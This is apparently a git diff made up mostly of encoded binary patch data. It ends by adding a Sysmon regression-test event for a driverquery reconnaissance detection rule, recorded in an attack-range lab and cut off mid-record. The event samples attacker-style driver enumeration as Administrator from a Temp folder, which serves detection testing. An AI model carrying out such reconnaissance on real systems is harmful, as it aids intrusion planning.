
z!>ZG46fFb;6wx%4v8soyh?qL|yo?wL%0;N2G}Wq6CXN)hnU2~XgBy}%a$?tf zxOs-kATJl=B2fsdzig_qtzzV(#NtG%brQ?ll@kNHp!W}EYIMGsxC$;a}ys>JL zMx{Wp_ubS=k+gj$K2w~FG6|RJ>RF&6O5}kJP4EEcSd7oL2-)JzCm)ceA}<;LY@#tc z6$LBsr@2U1>1kB06z#oq2oZVK!si9xs+H%!RH`i`>;;9e|C0dF9Q`JoT%DWfg zlJ2ONGMppcDT$#VAS!xQ_jCxGLYs>#>n>s| zRh4MXkDDpAwuMs9k6C10m5QdqS1L&tfah3M)=iDaxl+_f8EU5jb!4lfS@>S6&KNLz z{E<)Y$lf?IZP$z|et136>yNftC98sUZDW@8YOD77!z%}fLE&-JsmGiVI$_b~pH8~1 z?OPBhOF_af{3NI~7fhHqS{(1=BY1EdfAU6iG zD}i`KV}>&!5(>JrzW$(S>BbOcC2C9>bvP3ov1~V8))Kva=cWeaMeT+&!>R?Z>8h{! zMfCo)o5?g4&TOR8S^h9xp3>Lcrvg$mOT=k76EKR)OCD;QPZ_I*!>7E6Gt=s*AKNrdL!DCXgfko0QI%l6mL$@f2iNeJPelbyew*4?Q|81OTdU?b zrKZV;Gn?6^T%|n{_bRelRummjvgFAXebMs6@f_jI=C+{{q#qUKpcOF6c1CB#t}*H< zs$RR*+1IzQk=0v20cq+dXbxoYxeLLcXtt76IbRtmE2N=}wf6 zwQD>>4>4+sXze30&r(isW<5t>p~j(PtX_)M=N&=kXqZFtNsmO@Rrur-F%GoO*qItdz(9ziMUx(rWFSDEF<;V%o+M&LQJz~M0KY2x39sJi0hABx|- zb_`*qaV$#GO3_=PZ&Z%96RQ*G^U~XB7V7R^p**98U1)pA`t(igAVpVqOjSl$wmrg9yqfj2Y?zr=R^x5q#c8_VN1k+$HMHTK!9Ikr|bg zL}p@QZL=F2nH`V%;O{5n^N|oDv(PjM9-)FoPgM!ULq4x6YI@52p_i3?nf2Z2kKXqh zg1-rwQO;DNv6@s(ZDfDg>AbhLR5Ur^>eD7}f8)PP52|h3>ZhGd9zFm5P4ouw;_<}8 zuby!1(y#yeQpa0gegWrnJ9!F+Y$q`uXOw%2lkkX!c8RwSHbEjkCL|MMN9WCUZ_fdl zn$|+6jn~9DZFGc*DFzS3rR`cWh)V&Y>=w`mvZciL4*LBlNfUc`5L5}<1>47DKz+S# zAJs{1A3rFzk1cA8v<{`Jgrdo#v=8Ad6ukCv`MM+K9R-Am>KvniLp8E@z~iop=?TXw zWBQa)bxd#DR=E*)8+Kf6+fdjqL#o&Da*oVfCSJiGP}*W<8O93>XVbjX;EEVSO}6HPdd8VpkO`Fi40 zhiq-F1gG3G9$DKD3|W34-~xk~hz~f{3O!3;QW*_J1H@72oH+}R!;WU5tdxlaRFvf| z5U0fJi}<`t<8_J(B@wT)f!7ph*it;LepLxYlS{#?a27zkKD_I^PnLJIAC$+}_r7{U zujRj8_}>lhx7&u(8m}91NW8+y5fC-25g#*5rMnf&9EIC@j7x||w1I@8A9OqGSVl0+ zPG)cJ=aXh4_o&Stz>Uxh+Cg;Vgi7 zmVPYOErp$U*G*yquhdb3TgS`}cG3;OTV+w+lzTe#*k82VM|SZicRTg*bNw>6Qtn2- zj8Kdxci}96a+iJ?`fHSX7rec9SR^KM<|){7dlEkL(W5#BT_)qyDNrb5@qa9ibJ17r zX4HmK{=`8KeBPsRaC%a4u+73jZ2yB$jE4i^Ea3eQ#6gb6f%pE0#IO)8&HjU^o5So| z)X{PFCUDdNdlHJEIoK&&8z+|Dz^~|+Cr*f$Rrvg?#>+`ZyxTT;{`#O0?ZxoW@KDrV z2t_x%RCbJV7C^o6WaUGfmec*fi^q-nsu<@tg=kGY>R-DuR&viJY{}VH2V=UxX 
zhFmGLtkWRxQnY+~1YH?CB6PbZ?5lI20{tM@Zeuen*t`C@-L8mB;xmHJdo@1WEo?gD zE+6>@Z~n}KF8+*Abi?P5$T@)291xMSNX$-H^1ju7r#d+Hh-#c;)Xs8hOOLw-+@nNwd~LMjrb7G z0*DW%-$Q&P=J&YwQ<^>F&VKPpdO)!|HoSU9rXZNpwldXX@A9Ef?$dbrHmP{o>Ea&= zMUzdzi*Ocj|A=^zP|>@8RR5S62G1#iu^rSl9O=n1&(6_DPVdRg#h4{8)Yy z;(_}$j^^Ck+?QSQrgx4FAEv_7x2mnERQ;+FiYAkSBjGH7IJ$Ase^x)=$9_;Ae{kP| zlP`O4aL+{#_x(d()PVMzy5f+2)8QzoJ0CLr zCnsys5h?6Hig(2ruw4Q6OW^P^>(1#IHA9+RN2lcCvF(Arg#bOr%yVdSI(n#_Ni8-^ zHp;!%Fiq5Q@SFdJ+Cw#|vKuF70jxs1WcwVA&j)n-yfCTl^V1O9XAx>Xn!gf?=95bM z6wU(Z7mV*by8o;JO0jR3$7LPYj(hR>wP#O!VdkpTX#4yg?Xp%}Bfeg2+uWV8Dz0rU zemsM=mT>=W;_Wj!zKb12be#63w&tyiiLDAEoWgb_aoB^pJ#Fdy^#ynD(Kt*f?s_Bg z^|xydAGYECPv+h7l~Qa^7XgUESpeJ9-igCxIG40YuR{XU(eoSuE)-0SHPealIq|{# zugr%{?dK04-uxkJynxaFEEEsiJf*Dlh2gw)&#gTDqLOY83Os-c<+Dq z<5Sm#4L<|sOrc;Jsj8Im0+WH8hqYd5pH$qqjh7ROCX0d_;VgiD^#6zPa;Dg*ofO>U zlhkbDih8LSpO0vK9XszkUv|rzUUC~RClpOa1z*Bh!+5!R8qRK3w7dS>oiUn3n2obs zSimCUOYGmH8fT-DiZi$IazfF3e8HJ;7C`$K{PA+8P!xJ3%EbQBe|k*gX8ZcPUf#2Q zwNTtTF!J>g+2P@LtGh?`#7ZB;O)+vs!dU=u6D+^FJt{jw)nfHi!hSjZ>Wvy7%O3QH z4{!F%&94@U=YF0t>i(jlf))S%VpqF=4I3o*5Y7UKkKp^&rcji+@pUT>qdlVk^SH*% znxx{!&94@UCX0d_;jF>0MvwLGPT{M6AIB6MwG&<`s+ol=@vEQE_}cu{MqhTzn_hDB ztA(P;sNhRDYw)Y<$*(pmy8baofY~^+W>`A?>L)eMUQa5{-27^xXgZb|;a($mobhFB3P+s#6LXhr8NSuCza&w|NahF`nFo zvjEE78UIr5iH+||OqY8dy=PW47HpyXi35(`+pKZ$$E4!GZC-;=G#QlkFPsHDo+S=~ zFt5QBgQYhxObRQ1$v98?30pK?o}63#UUL0Eb6$f`G#MpcdK@0*EP#4L<~5)_*7yg> znDA&;9rJovZ;EoIK3E9)&uaNDnlSLizxWuB;>|8}3~}DdO#Feg{i+g*gR6g9deG~m zvX{-ddHb@F4`foltC~hR3!r=#Ea_cYaJv1RJpSFW`KQdydg|L(zdzx}8*y5Xzg&hx zm+@WpER}J{aBxLBj=3%0lk;~|6k#bU%ng=S(#}p115S3=n+$>}z;_N8=QJ#B6> zRr>MrftQywUS3WrUfkwu3q_Mn!HaMfaDRAzn6GV$XeBj}DkFZVcShrr`ycVOxOaD7 zcFCLG`3!NDIbT~SnoJ6ggtGwRNaky&qGE|7##DQMim_SI^)SWQ!c!h`L_Bev$=@}e zZb&MgUb65MJHJ>cnvW@X63zl>$7Fsn>sIi@KAL!Oy1Cnnzbz8#T9?MGWUswE_7qy( znJnXyA{bZkipI_T;|rJg@sGXfp@$fMV?T#^s673u5{m1eIra8mEGsQo(eA?IH|(q$ zP25B}ML7!~ZZ2t*@`u!U_Ji{H&`G05&+T>LBWK>$ci|?S)_IEuamc*IVffVRMl{3T zLb97!Y~~{IRU=$?0g(xn(RClNQb62wAKYiJM|Vw_4|(>%+xsL?-jNH!m0QlZbNfJh 
z3o7o;!0jWsY{m@rTa=8TO1LzA5!RouH_5Z7OmUk>0=fup8Wx{K0x+>njIcL?fjs2O zEPS$EP_K4@Uj2t|AA`@H?yG%xiyxn0|EIBjsZcbzl=dN<1+aZM<3~a$@o_%Mf>9+P z7He^WJ8 zH|7yH#1Hdq|J3-oBB}WK*1}KhI;lc29)5(g0LBB(dFR9rcVVn6&r;ieOO~GD=u(@Zc8#O0=WjgauX{94 zBNQc1^J0if)XvlNz>bT;Spae5^t0K2k+`4jKDVy!wNoX;6g%a0J*O8V3f4_tRa3VS z7t}NCulSe7$DAwt;lrDM?KbaRC^j82@tbY09Y1{a>>;7i2Y0`cdWQHA&H{)Jr+-a+ zBo@loH#Yp}5>qHjRrR`D`nPDO-q5(YEUCD0n|Cf0O%??=!dU?QAE#eU-0YA0ADUvL zcEXFJdWkFQrDA-(sqv*&JnhSFdDBa7^Uj5$$*AB5n{= z=WLYXn&ibKYflw>+jM72V-l=tAy&-bis2O~pN*brd;b7zc5YOuQX?|Jii~?}3BGn{ zxqt9Yx-YqV%Uj%K$vt)+h)^_{6uAp$0hGHlo}%0nkEiNK{&i(3tX1fT01c{=IH3Jt z9QBUI!`y0rc<`nNHWCj;enKe5!-H@ZKs-3(C*q;5`5U$S|LO+|UPl0!)sN9_#0Bxe zaU}oN__#Q!`1r)aM{NEsM|5o6UR^Fem7?8jy4@Pex=^K66f@|l8bT3aV6NHS;mz#t;rf;J;$2K zrqg`vMUud%5_<+Lf!`f(x9NzE)P&6N0^rCPUK)vXUmypD6e=)20edM}>XpOttQ|QJxpu3uJeWy=IJOYKa3d)W0sOGj zd2em0XmY~Ur%l}c#($R{w0n0u8j&=2DRu6uX6-K<61$1^harWDn4_`!spi2mVkBXp<9(Paj z@ZmO}O(>qdBl2~@m)B-pJ@)ufujSZz(v^oOC7cCNe>mfM_5&s!*Sq%xCnrzZwxiN{ zQoU!T#BuERdtc*Y(5wFN;mvPx%aaPlEsy{HsFYj#6|CO%@%YwPy#EpH3-KYG1rQ(3 zI6s*E#HLWVUeXllC!P%4e4ueNE~&V2%aaO4lSRRea2D|RpSal{^Q5NOsGT^|7Ci{W z75y6Ku|CxJ+AtyCm)-KFm)!ECLeXSY@FkoDJf0%H7*Fl}JgHgH?zVAv^Q1P;RB9+A zCQtg2#@Vw;#hF{4R4AH{FE|s<0%-r7@zwrf|IiI2_HPFQnvXSZs(y9ky?*>^Z~Dn? 
zeQu%nedS|28$Grqe?v*Z+m}V&oG-W$&H{*=J+(f!S#>Z#T!52urTyW$&7WxbrgTrH zeBIXP7K$d5B46Pwfb!jw>vNmcXRgnUxZk-x_orIkU*sR<6p`>vHsP>WbQSeZB{eZ*P#5V?|b0$bB%*lNyUNN`rJa%WKi0_a2D`*mN<~L z<-E^JNem0o(#%b>|J7b3H-esC4v@5aVV$|^9Gqj{a*-~nlqm*FZ`l3T#0l|2Kj90F zm&eb~d?va6pSeD_P&64OUfOqxauz_nv8UGOHmi!gB6*rgNLwS`% zl)6MCDWLrc*SAxO(@2-a?T6>z{gbCubc2v*%bM`vbc;0))za#@Gr_na;}iTM|M4sTw4 z6H`Rieo-HsMEua+MDV##I_H_rA*H+Luyr;vOW1g=#WXSTt)tCM`?bS8ZGsK5*7C?M3j_KCc)-%EE$25h)ok+^1A9FHr zbE(G7%B14PEsrM@O%??=!dXD$p5qRR>XrR5k7tUF+DR#Ed=7C%y;O|P%QU_=968RH z-SVcFT=RIEqRA-nmD4=RS-|~n>ZN@nk7ri2yKUUvJf4j+Yoi?EOYGlbjkB#u#hF_k zPbiv?FE|s<0%-r7e)j%i|H{?TV*hp^RJvT_rpMOQkNx=7-t?1O9#1HCxZ$YMWlw&W zyL|EwgC9Mu`69uMa27z^FpqcIA})K!aYMF#@;015+Jon1pIx)+^!QTBm3o2soh4en z@4l2w`MTxtgrdo$$X7TEpnRFf%Uo>x#UkHi?XzoEpR>ot3Wic!JM(x~XnD8UndYlK z`_JPEMU!F5n{kkE7C?DB<7CP^@i;lLc3oEd&c;Vgi1cgDYzdt&`;iOJk+Uzu6W00QMteb4;Nl^O?KlZpekJf2WA8I<-f zoCQ3dB@Tj+$1}xX=?#FT>gWrddAzGMUQRgk!=IAt|CxC_p=dHnyi7)FNjM9j-e4ZD zaMj-M|3b{Ki2wH@{J&*dzVp`3EnVlM-`tyBn92N$v7U)geDs|IxA)()=ESuRTvYJz zn_rKodW>s-m9_EHoj@0iHpx^(f<+&+io-cWN z^Y7gDs}+hSlOj*yEP(QK`gfG)LcHsmW1Fa4_m#c=#$jJIz!tA8Y>_;Ucp|RoM=sa6 z8rH@iuDt09xBY5`Vmw?4X92{O(|;tc>hd2G#gtcn(X3XbW=Pz?e(FDIxlc%{+_~O$ zN+@<66QO7_DEdS=3%I{1`ha$mM$>e$ z0OjuVhxgpLpt|;PtE)$p$!s-*Rlo4Sc~6hI?e zb(8+EeBkCfjhB~_iWj&2YK5Z7rreI7z|1g=leWiBbM^yAS;ww~ zC=7LC2xA?GsIQqK0-p#WKwV> zoCOd^+(+p8b@q6B;)pR7u~b)IP4cm1R`l-gS8L;GIB`TgalFR$8c(63Wa7zfzgnSa zKBnMFI18X1e`xS4>C0^uxxxN-LXS86@v*8g8y_l&o; zV3oDrIMb)xn$g2qKV1K8HfGmw^)s#rSAT zMlJtck6!0X{@&svYh0kQAFEI_nH2d8X91MIGd`mH2PJHS>K6x{F+0m%LvRMr!}(hk zj(J@&e~bRjETF0!%gYvGhFKvZrh|{bzae;YhNp}R>;n9((ztnGvp?K;(;J(ue&K0w zt)la`gkn702xkGrjWcc{ZW4=|>K8L!EsH4z=osRI`i1e*O&TZLl8TdeT=EA((PU8c zi*Ob|KbQMO$@~e?FLmV)l5J=F>lafvmcEgB#l(-qORF`G&d<8Zm!0yaZ$2Q7j68u* zG+7lK31~+%Zl{8GD zSnwfURMq(9&kel_nq=@HUo8k-k~i{}S;rK&d?GpPUa&{n99MIOMyko8;N}*M=z#mh x#Eo-aasBT{@jDDs<@~KF6DZf(tMSKQKcD(xUb++^~?AF&)kzY?`B?{H{=1sm&tE3%eyn@%su~m z&bjy8rEu2tq8YPFmAQrWjT#)os+m%4LS~YkzRvsphhuj7B~34A%7LaFXv%@69B9gc 
zrW|O>fu+f_UNk@amZ2c}iyGEavAZ-!e`LOXGrt!LkkOzLYL!>ds<>5mQ zg-qM1I{AQvgheE1V=%>>vddky0A6)y=NjDED`tiNB?QXscU&2&*ZPhBA z@&ma&+$vQSsxwuos!-LqUVuIAbp7L_ty9%mYPOn%AFJ>~YN)R&N3v=)M-5U(;IB$e z#hp^5nS%3PIL^SGxvCOZm1;Ut_QG`~?jND%!5t8l2c z_AAIrnm3AI#Ra6^#3e~aeo1f6UKa;gHqg|k|! zloXV?&bSbWPy1`C8i9nA)hsKKVxq9>go{oZr-kRFsBxAoW?D(YBp6Z=T(AgmyQ_1W z8U+DTEX*R33-L{^q%0v~Xe#rQmnkS*R~@&Rco@{;k778zP${O z^g_N=;vVr%Nel%6QPC@Vr9;>h+B`gAXRuPgM2a-g*3(C%spIj*q^-ZYm1^HCC9ADE zC`G|^LC>XFJ8%qhW`AS4+DE0Uw)hnV0B79ORfd%gk6ZV%an(k(R>e5Z$T-M)i`Yt4 zBUqn&Rm~q7qZzlTu5mu>WRxqz^%rakX)qdXa>H%UXbW7TjtGqr(d3Xq=0kI0@= zC$Dg3S_AoGo2F^VQ>vYCX7dKpQiriu%qb#!g!LBY7zz|~%#~ukRi>$7=`|GK8J_d2sG!MjOZ#ccoH%1?)%>Q^ z75Q*xD?62|v`64wWmd_Gq612nJh`GTntnLGBb=FK8!AEiVNnj+0;4QvbXM#fqn@Jb zwM(7-d}|w7ee@TQrv8E~AdBB!3jRd1MJ;nUliC(s9;~0-C;DU>6cQaJx=dBzv8|ob zmB-OYDLHH-M+`(XKib*((N|NljICY5TBC%;d*1%O_V)M1DV@=0ou#OQM}FgBY9IS~ z%7UmkFq$(NG5m^A2xsn#CsGvEOc<)Xmsaak`2%o10y~dX^M_(b&Z|4H55=BiT|m;kRQ~`UvfC2gjq}R*Z=@^sB09@zb ze=cZ6RCoQ(p(u0IQ`7KkZ*ZS&J=xoOb^xxjRgb!NM;y8@Vp-w2mXkBpLVOwCN?pyj z*><_Ut-1?oVyzwT&~J=dDEa_=d(A!^wQz~NZf*j_ME6R=Zd;M>RGnl_xK zlGh_~&U>tAupCrdch9i$zZ6%tqy?i@kZB&?W@{6EMKzw`mr@r}-t-nKzN zarn!_n~npeJWw2lJZR`WMBEi8{80YhwPOf5B}dlOijh-g&?#eamIqWE4J_p0Zz%Gq z5Hxatq@lR(i|c&gifHL)p(_X6<>Rjq_XgrFvE3g#k=h$qluIG54~L`*@I2o<6u;!- ze?MIJ#~X`qMoN5Zf210Kr%Asr?heGAY>S6{9CPvH;hIa9uYP!6Z|i;JG8cEUEnWuV z9PdqyuI4ptgVa_rCj>glZ&eFwnL-D@|_iReJ;AQ~c#+>SlROBWPN1l<_0{%f# zpS1q5ygMsz&VqCU7ncKBj_-xT)nL!6F*)~ChM zmb4wdkR_O@@X2NyF9?~o2FP22T&IL1Ad&W$nAAC@bUT=; zK_{~S>BF|Ebmf7jnQntP0=7$<0u!U4P(rAkvkqg|QYHavW~HLO$;h{|o9dYj2&`N& zbLgUo5~pg)N7l1>fsV+eI+sdvq$ku0)y-^hQLQtz9CxUk=GOsCsmW+Oh#-wZpP}w> z`q{n|!SQyokL|Ow7puGKwJ*8V%&3T@W+o=qHoLJkvty7S{QU$R9}S^q7McdZqpD!h zQ#C^IfG=vwTAp~`(90^n%KPq=$L@avmA?s@QO;DNbv4PF`pEvM>pAais%mlU)hAEf z^45Qs>{nk%^=p3d-xj}|OdfsS0~_cKV&nP5gRh=&)ROIgd8Ny(ufBwPx|}?XQuv`+r2#tWa>%_oi;ubT7lRs7-45_(8FJY*L$~bSPCL6iptb zdrqn~)60#j<4Bzyi@>9>>(#amh5a(r z8WpgDm{nd1ab>md<9LV0*XJvK)8WrV?YvMlKVNVr 
zoCVO%mxZ6{d@h=m_a*~4Q_Ue>sGsh^kEx+3m|T42cD4qK3p>DD4yRp{_V9>BM2 z|8Ol%>(!&gKQtXOMk7nD9gbPT^{BxhMW3%Xj=IX$!3uE7E8~&1{lJjr2LdiIh>7@s zW32|#Sum-SVk(HE&;WEgK8Fp>LK*!V3?v|+@zfOvgm$2p%a>tcT>&#&)u^@N;dzghU-bsuzm9=A1K*W;9Ug_9#7 zYE>sbMwlvgsxEUFUhA=5LOh}jBvkuBv$L+t2!_#Tz@t05b2xT3tl}Fj923vq0bKWJ zJf9y4`@(bl$f>h_zMOVjU4XwRo`s?to;#q*Dx3un&(e;?yrr-cZ@NiL;H=5Bwacwx zW-A-vhG18DlsDy`4n6i~E%y=K{mI=9ef(Uz%&nBW(JmttTwE9fKy5aq2`Ul(G0f7UzX%By=-sLn(jaAREVfH4aWmDh{5v za1h)6AQa=_KsXC{`vY-MpmE^6{UI?dL{qc^+U1E8;$sYpWEe%xFkL!INqo6*>PdZ8F%}LH+b`B9&+(#grXZhe?-hd zI13;?o&LMO2#ss%TZMA&+OpK>+X&?CRaCW}o$GFAEo9@78I2Y`e-I zKD_xo&$;+LLNV*<(uwPG7Ytjm<^Fx2%4^e~^*7=}I13;?oPH1Sk(l4(-cH$Yn6e>k zc=e1-K`4n-i@hs`KDl4x<=dp=pTb!H{etn`M)#jRKqgBb@n0Dao7&GGKD_xuR(}Db{aGmPyKzcoy9>faYhGA! z%7wFfJ|y@M&H{)JvmTZUb>hAK*^f`%5H|dDm@|cfVWg^B`U^}3ZXVHkrBhOIo{>J&g8<{?8K{H>;D18#ljND4Hw^ZiKTYzZxypJ3EB0@qHXqY}8KJ zQdBDoSK?PcsqwY(>-E0umN&iR=2r_vlTpE!aMt8kHHVbzuFXvVvD5s)mssYcv|D;e_M8b&5vL0O+TH3IKMd# zMJS$MvF3Lrk4znT>2)iQJny{bZwqdOvjE~o#-YH!K;NB2+9IPp8odnMFtbi6L>%t! zM7h%be1YRLTE6GEPo{h?xB7*}j@uB5CX*sx;Vgjim2n%0`_#!dS%VtP>@x>7z~i8t zDR1_3-=O84cK9!Sm1l4L0Nutl2t|`&%KNPrQO*J=Z)ZK3<#~6GYe?sK=ONf_c~kD` z&@<0!xnGpyPww9IxZAh}p%_o@!dU?2?yUb(?uqs9OH7x0?Y(DaGv*Vd{D}kh-`l8h z@Q0-0z-?TEP&65o@-LhPygo}D1Yul*DF#b#pqmt?%aMMb^bnBYt}3!wdS z#%=Z-`&BLWD+2kyq~$*4;==~r>!V)g%^!9fuPqd7-)TLZZHZri8*Y^Q7tk-lSpenk z^oIj5UVC5U`VeNlo(Gz^pk846%*z@dPcQa|4{!FzZM?Qnykpd?eb0DyY{Bxb|I8^^ zv}L2w!g5W&kGdaJwwBr>6FRy64yqZ+JxQ*8qiYA+a7vU`6{_x%~ zUfUGW3Thx#N&HanjK-1cA8}jMr6>0VTiGXry}Brcw#@3ziB+(kW@UqV&N%ve6dh8KU44|oCVO1$@pUCt>B4m zH1X=`jk82TLvxRqne4Td#~wnf8EaNOYCJFxm+p3IQEb! 
zF7rr0m%&ZL@R`$nl@D+A$0ynTY0O_L z6iqIrdvs!)uFAK@&3 z^#SL&bK<86dqZ)S`uR3Z{L(DtZ1L<9B8~Qz*v6m2eh7TsiBR#1%0`Y&Fy;VAo;G%<#s+T52ez z#>UrJ;);5U?HO-se2q&gzTUU+6U3P0r=gzC}Crmd4FxNyUxZ zxO1UsvM9I_&I0KFIQ?qkW^Y{o&=ecB6E^nhC9bHK%5i*K<4Y}n#+TjlrkC8toeM>i zQNfpR7V!Q{((bcK*q~gqN+__LRKVNVroCVPS zIr}f|E%pyM5&Oq}Q15EojJd!0AN}~%-t^N_wksLqQiS4XX^W2e+lp}|kMx_fHh*=_ z^TbU##vKV~0mO}rOF{YM_=^O>A4N#d(J1A0!HY@Onkx3P>CTYGBv{o_%$UK|DXNe@ zA1%}NO7~do+{jX;j>`Zm((kPe_}Z%F{^2+2zU1yLZgICI_tKDQe~p6$uRQ?F>__i5;)3{KKaziId|Z@Ne0*x*BR2jZ6io(2UkGObuO|^7 zBe5qIe`p+xj6$rTzJ-Yx7KTvnFETtH~DQOHF zp0OUuNE{0Q_^!w!8*Ax`xTQX1{Oms(zx(y~hhJ~@atHOHF)m3c#>2007VvsKVL@F; zotRkMtZ{UrnZ1pxBP~>+l7lTej+XZJeT}PbNyU}rhZ*CLgrfQ3q8Ej;0P00&J)XD< zmLF#M=i;aTkH&{uHDFEh?52ee!)^-2c=)K}EM(i-)OG;3H9w-&OQ8z=6R?(orC!-B z&svcKHP@bXmIos#P>(IeFI-59T>wAodd@qWs#+X-^~n>ry!GED`|aG@jzCSCtCVv5 zyt89rtB}}Dls|MSOvD_G)n7Fq?_^Ef9;43=jM3G-M&oNpaXQk@MQ;suWIPkU+lywg zt~M9HN;IsYu8Qu)DFz?gG(KK??C5)whYz>$Y(nwOt&!~|UtODb_1I%Zy-{GtNmm@8 zlyDY6{o$;CZJ&2MpwlM2O6 zPyFt%lw13itlII(_;y!(@G*^y^lKQ$`bgtz-GpLacFUVya*LA+MUzp% zmv9#F`V{fS`qb`^lbRXrZX0(tPHN*!rG_$M;-nvIoIRIRoVmqGg`)ZSf-~VPfcDQ> zzuH^uADV&0{%u8t<`a#ZnqM7ypC7;4n|^YepIaz?U;X&DW{+iv7a9jElZpek`MHIn$)J>f;Vj_wS>izEmh(O?B{3{SQ!_Tr_E&q7+z48F*+J57 zg>}ZN3viEZ%Vj#HQl=OzyhRDm=7Hz(744$aO8@uVLCCC%+_fa{xGau>Bz|~a!_UJ6gM8O1W z^=6)70->|Co+!p~ftK#n<~9o0<)T&Sr_(BW9)e#P5+jzl?+otVv-$;0M@R{?b68xc z8lh-@wBSxS3!t80`vT^h#?nkCUVY??RR;`NHn{fEKc&6C zntF!#5Y7UK57uLPcChtKFxxRrp>QRVxzdg~8MwJr<7P!tapM-p6N)B_f*av1p!J@k z_lxS4y)lkwijCSyDXV`DaYemUj^kw-U+WGX=gV$+(@U;#JWbJLl=v#higFfkzngk# z&xqrh8SQQxcQ%e^Ikua zTTxZIT;nEtbLuC4{AzFd$t{j26g%H=SjEz(zAIcd`G>)eot$-v;6^wLAZ{4PJNXh$ zd&ho5wtn)~oj=-w=VhH;GwXE!Qp%Njf$^QiTE6eSl1%x!#qorq$)w0vI18YB8OO_9 zWc$S;-(;<`Yi6Ib#m1@(rM7d%@vhMFZoe(fS9$gy#}kSs!<0AcLBd%82-J2eFi{lB!cybrc0w{N9{g-l2teq_} znR{(3GqV{$p!})t8K1dQg5={M+VL ztntxq?#(XDWch}rI?|;zp+>kNfmpr}scW&#|3PqDik*9DLKzTa-JIZq* z_J+pTCMwrGWv#z)SXT|O#g>O9lE)EG#1;L>Wg1t*+WW(mH$CCDUae4!hb!SMfVgt{ 
zkHl3&{$rw;^6D>|*{akGsW-5l`j1-f6Ot--&Uc*>ik-(qD4Gn4J`v6W?k|cyVHQjX2t|`g!Iy9r@c4)LAB}CZ z%xv3JFh_*hIIA1SM16L(#@VA&lZi98^=gHpnPGx6;Vgjm%NhUJbL`hNv0o9`uWPj2 zmoA?=_I4lj8*l!w+xUK=DD$9y0dBZa?pI^nf^Zf^CEY7u2HTMc2> zFWh(jGh^<5nz)emuxm9w9=pjOKD^lp=h!x zcoEJ5?hg|$(q%lJKfEh2GYtKt?Y`3-{lH$5yT3hg#5xtR)KFVZ z^08!Q^vm5jTA^rurr=393!ok2xw!+wpIG^RBt) zsP&!O<#Z-)CZM4}I13mtj{4#JXLIli zXFp@AGK{+UHO2;&T6_Ipl`^wdsfkZa-TzONyXcJ@wfuKHcAYQzd#fK={Q`~kScRg= zq{v@53!wa+^&`rEP{KB-adFTMXtHrN1L)!Stt!X3E*ZZ?|7JE&H5b#%mSTiiDQZmn zAA)~Fuycf`^b70`{H)Ztd2pjY+<4O)8?AQXX($lUaa%$$9&UuQ0OH13Zz66It2Z?+ zX1rP!Qw-2C#0T{Y>q|FjoIIaYoczlrejpT021UOJX94tcxn7ivpAh}hQ2Zd-cE-Pc zF@g`lugy^N-!)2SU*;e$WB^rG>Kq`Z-Sjc-O@b{H~+QRhlDKQMBCnR(117 z(;xnm#z)=`fB5ibm)yn`3&lS7&CS?2J+tJGKjn5>|Bv1;P>&EF!dU?E;q-%vk6i5Z zZ@kr^{lpI%!bbeXFQ%cs#Cp{XYmN+io^*RA4O1uzckOwPO)Y>_tm)tsu4YO*M}xkV#7;C?Z2;~ZDq`0G*p7M)Z%erw7E%C-J% c{PE|{r~aFVxlNeUbHJx_PMCdIwoSSxsYz(5sPIv- zh@urlR9tF7P+3G-L>3X*1Y{Q|i&#E{4-}=Se4>c`{{MUL$$RtWzR62F6FT#oN#4wx z_wIZ5ynFuloO92)_e}GeWi2b$w5i}LZV#M=&$ud5YD6qpWVgRJ{PXP(?)FUzHz>3~ zp#=&pP-uZd3lv(Q&;o@PD6~MK1qv-tXn{ft6k4Fq7HD3xtZ_xhY9*ulu+Ou2CpZOG z?4{JD|GoYfecrf_0<5QH5 z^{BP#NHrdR-D)Y0w4uym>{sD)C608dPJHWB%TTfk-#c-9yjqWQ9r&E6Cg86IdlOV0 z-rIVs?@sy_kL}#~SMW;s);X_K%~cz4=N?@n0N${3=K|0r9DU=AGBsP*z7BP@qEr{o zPR7jZO2KaDk@a0^c0JS!$%dXW7TQ;N}L+5h8HyysaYuYNn7I0#e;l} zHA6Mw++o;C2|3>8@Mngo591b#(PS&}_$xIDY`ThKRT{4-Ql-VQp=t~c2+~In9;8mP z#a5!FI&dytF;o>7qtCq;Uj*W<50$8yC`ewd(S;NX#nplMa-hX&^BKizp611BT_ny5 zV=93!>;imU^WIYRAuy0^VH2^s81Gb~-j6TRb5=cErcS`=4d7cR+OZYw&Y~r1R56-; zHoknt-tnj}4Mn9Zb(=P#Xd4J1i&{}eHxGLeF*Ws!AxRvRi_ko!YGhGt2+-oml9r-! 
diff --git a/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json new file mode 100644 index 000000000..d2d824504 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_driverquery_recon/9fc3072c-dc8f-4bf7-b231-18950000fadd.json 
@@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T23:53:43.425641Z" + } + }, + "EventRecordID": 33534161, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-26 23:53:43.425", + "ProcessGuid": "5AA13A44-B487-68FE-7F5F-000000004002", + "ProcessId": 2052, + "Image": "C:\\Windows\\System32\\driverquery.exe", + "FileVersion": "10.0.20348.1 (WinBuild.160101.0800)", + "Description": "Queries the drivers on a system", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "drvqry.exe", + "CommandLine": "\"C:\\Windows\\System32\\driverquery.exe\"", + "CurrentDirectory": "C:\\Windows\\Temp\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": 